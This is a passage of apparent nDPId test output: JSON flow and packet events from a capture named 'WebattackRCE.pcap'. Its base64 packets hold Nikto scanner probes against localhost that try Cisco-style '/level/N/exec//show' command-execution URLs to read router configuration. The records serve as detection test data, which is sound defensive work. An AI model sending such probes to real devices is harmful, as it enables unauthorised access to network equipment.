{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="} +01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
